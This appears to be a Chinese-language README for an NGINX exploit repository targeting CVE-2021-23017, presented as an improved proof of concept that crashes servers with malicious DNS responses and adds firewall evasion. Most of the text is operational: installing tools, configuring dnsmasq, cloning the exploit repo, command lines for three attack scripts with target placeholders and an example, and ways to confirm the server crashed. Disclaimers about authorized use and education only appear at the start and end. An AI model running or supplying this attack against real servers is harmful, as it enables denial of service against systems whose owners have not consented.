NGINX服务器(版本0.6.18–1.20.0)中的一个漏洞。这些脚本旨在通过发送恶意DNS响应来造成拒绝服务(DoS),并增强了绕过防火墙的能力。这是来自M507/CVE-2021-23017-PoC的原始PoC的改进版本。
警告:仅在获得系统所有者明确书面许可的情况下使用。未经授权的测试是非法的。
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
dnsmasq:
sudo nano /etc/dnsmasq.conf
address=/test.example.com/192.168.1.100
sudo systemctl start dnsmasq
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com)的恶意DNS响应,使NGINX服务器崩溃。curl和dig触发DNS查询,以利用漏洞。poc1.2.3.py中使用并行进程同时进行嗅探、DNS发送和查询触发,必须三个一起运行。三个脚本一起运行,并使用适当的参数(替换<target_ip>、<your_dns_server_ip>、<target_url>)。
poc.pypython3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc2.pypython3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc3.py(推荐)python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
检查服务器状态:
curl -I http://<target_url>
502 Bad Gateway或503 Service Unavailable表示服务器崩溃。200 OK表示无漏洞或防火墙拦截。监控DNS流量:
sudo wireshark -f "udp port 53"
免责声明:仅用于教育目的。作者对滥用不承担责任。